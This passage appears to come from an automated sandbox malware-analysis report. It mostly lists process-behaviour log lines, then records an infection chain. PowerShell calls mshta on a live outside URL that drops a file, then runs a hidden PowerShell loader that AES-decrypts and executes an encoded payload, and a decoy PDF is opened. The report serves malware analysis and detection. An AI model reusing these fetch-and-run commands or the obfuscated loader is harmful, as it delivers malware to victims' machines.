Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1240Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2114Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 698Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5208Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4514Jump to behavior
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Buddy[1]Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep count: 698 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284Thread sleep count: 174 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7420Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 0000000F.00000002.1515804009.000001BBD2C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 0000000F.00000002.1514741138.000001BBD2990000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: mshta.exe, 0000000B.00000003.1531658058.000001FAB7895000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1542410574.000001FAB78E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1531658058.000001FAB785D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545347428.000001FAB78E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522254832.000001FAB78E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB7895000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB785C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523891007.000001FAB7895000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1545059091.000001FAB785D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2523907525.000001F6F842B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2525991041.000001F6FDA56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000F.00000002.1515804009.000001BBD2C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 0000000F.00000002.1515804009.000001BBD2B70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCate%SystemRoot%\system32\mswsock.dllormatHexFailureTypeNotSupported"
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://evanbconsultancy.com/Sand/Buddy"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://evanbconsultancy.com/Sand/BuddyJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC712DC4913AC95B231C44FD0E7658E3CB70005CF09FB0595EA559B76132DAEB0D282BEEA68B55E7A9BA44EF8B45601264C8696BD55528EF1B9DD98948B27EC7AB79A994DCE5DC246101471E8511E44683A6A4FE675F17184B0F45DD710B0F3E934D3E87202452FBA857892530000F7A72AA942B3A7D215E363C31E439657BB692997478E7649840E3437D9791C71EE2B525FFBC5C786EA290EE8548D38794A4901D3E34E39A178B30A8BCB2E9F77F8824F798590E894BAA701C583A6EE6499D5DF0288032084FF43FA83E2C5C6512028F2396510D21950EF4F2FB6318F3A83552C75935D4092DEB0C6B32CB3A99F0963415214D188C9BA0BF5D41A7805B5D549104E9B78022BF15FA2D7048395767284235F5312081A7124F018F4E91EACDBCCF751A9F28FF37CAF076B6690F025C400C18E2BD9E1A7BD3ED7F7A96C28C15F00B93909DF3C243E431A52E02F105C946283D2D013B71935B51194D17B7BA6983861748E298038CEAD85ED1B369523E084E49C8D30900FE651D1CA9CE4AEBC5CA07121E32BED105B864D5F70953DD58446FBAF635CA7BFB75757279A3990FB975F4A6CA8319BCBB285862375238FD471009713449C2B5759EB614AB609037130BDD0DF5A80E11753BF15D370D14D9457E1A29A143C2993ABCEFC9EBB18A41FD7F01477B69689096D79B0C830798EE3FDD6CCAA115FED76DA4C183FA9145AE9365194967DBD487693C4F977EE4623572CD65340F824D903A9BEE74E567BA2A59D6049158CA16BAF1E740DCFF074D5B76ACD69BD6E62C8FFE8ACB399E025061A2791DCAC39AD53DA9B95EBE3B0E8F162CEDA33CA00F31C9EE377C87715D2EB5D1329BBA8D59E15DE0E867D91D45FCE6A1C1E307F17C1C44415AC23730598729B5AF81791F4BD7DD68D59E5463C9A238BF8BA3D80F58D15CBCBD76A2244C6935E83F51AEB529749508568CDB60F284E5D4320EF0CF1DB2FBEC894A24FF83258219EC3A042E9EA4B7B09A2D6BBF3BA837EF69734C94330CC4312719B08A8D97BED4CA520D35A041F982D71D75204AAE0EA20B8D73572E4BFF0EB5AC4F25EA4DB8C036BC8EABC00D579CC10384D09ABD62B02E86C3A1C7F8C862DE3364811CAB68EB1786B7786BC5725D3493F05A15EAEEE2EE6686D91A9B01CBD4C7885E2B196DAB3663650F11D71EEEDB96A2AAF3442EF119D05205B47F44D7200C81C465F54C21EBC99FF2B96579620097C613B589DD515E8CB8F3230A889E2C6385042EE85D8032B14D1F7031C085BA84F4AF0C953A0070931BB3147C2D40EA5E24309522AE090CC33FD5B9A998F2F88D262EBF6918701F47BB35F236B9AD77BEC3181393A4E03153A5F978106133C121B91E124075B26668FA32D6D38C829EF61BA386E20E210F9B2F8550F9D7F0472F77303A216FA96285E529D264EF798AC3EE226E25F6E9FD15A30A8B1993A229685BC002198BE999C694C7545467374416D7458766A525558';function slF ($bNBDb){return -split ($bNBDb -replace '..', '0x$& ')};$rzZJRI = slF($ddg.SubString(0, 2208));$qvt = [System.Security.Cryptography.Aes]::Create();$qvt.Key = slF($ddg.SubString(2208));$qvt.IV = New-Object byte[] 16;$yPsRN = $qvt.CreateDecryptor();$qVJApxuJ = [System.String]::new($yPsRN.TransformFinalBlock($rzZJRI, 0,$rzZJRI.Length)); sal fd $qVJApxuJ.Substring(3,3); fd $qVJApxuJ.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Company%20Information.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '3a0550e6f02ff19f0d7d65aba4322b948e6128c005b35a41c185638a3b71c4b033f6793763a141fc2df5f78a32cfe93fb3f106bbc73bc0347eb5117739ea6bcdc712dc4913ac95b231c44fd0e7658e3cb70005cf09fb0595ea559b76132daeb0d282beea68b55e7a9ba44ef8b45601264c8696bd55528ef1b9dd98948b27ec7ab79a994dce5dc246101471e8511e44683a6a4fe675f17184b0f45dd710b0f3e934d3e87202452fba857892530000f7a72aa942b3a7d215e363c31e439657bb692997478e7649840e3437d9791c71ee2b525ffbc5c786ea290ee8548d38794a4901d3e34e39a178b30a8bcb2e9f77f8824f798590e894baa701c583a6ee6499d5df0288032084ff43fa83e2c5c6512028f2396510d21950ef4f2fb6318f3a83552c75935d4092deb0c6b32cb3a99f0963415214d188c9ba0bf5d41a7805b5d549104e9b78022bf15fa2d7048395767284235f5312081a7124f018f4e91eacdbccf751a9f28ff37caf076b6690f025c400c18e2bd9e1a7bd3ed7f7a96c28c15f00b93909df3c243e431a52e02f105c946283d2d013b71935b51194d17b7ba6983861748e298038cead85ed1b369523e084e49c8d30900fe651d1ca9ce4aebc5ca07121e32bed105b864d5f70953dd58446fbaf635ca7bfb75757279a3990fb975f4a6ca8319bcbb285862375238fd471009713449c2b5759eb614ab609037130bdd0df5a80e11753bf15d370d14d9457e1a29a143c2993abcefc9ebb18a41fd7f01477b69689096d79b0c830798ee3fdd6ccaa115fed76da4c183fa9145ae9365194967dbd487693c4f977ee4623572cd65340f824d903a9bee74e567ba2a59d6049158ca16baf1e740dcff074d5b76acd69bd6e62c8ffe8acb399e025061a2791dcac39ad53da9b95ebe3b0e8f162ceda33ca00f31c9ee377c87715d2eb5d1329bba8d59e15de0e867d91d45fce6a1c1e307f17c1c44415ac23730598729b5af81791f4bd7dd68d59e5463c9a238bf8ba3d80f58d15cbcbd76a2244c6935e83f51aeb529749508568cdb60f284e5d4320ef0cf1db2fbec894a24ff83258219ec3a042e9ea4b7b09a2d6bbf3ba837ef69734c94330cc4312719b08a8d97bed4ca520d35a041f982d71d75204aae0ea20b8d73572e4bff0eb5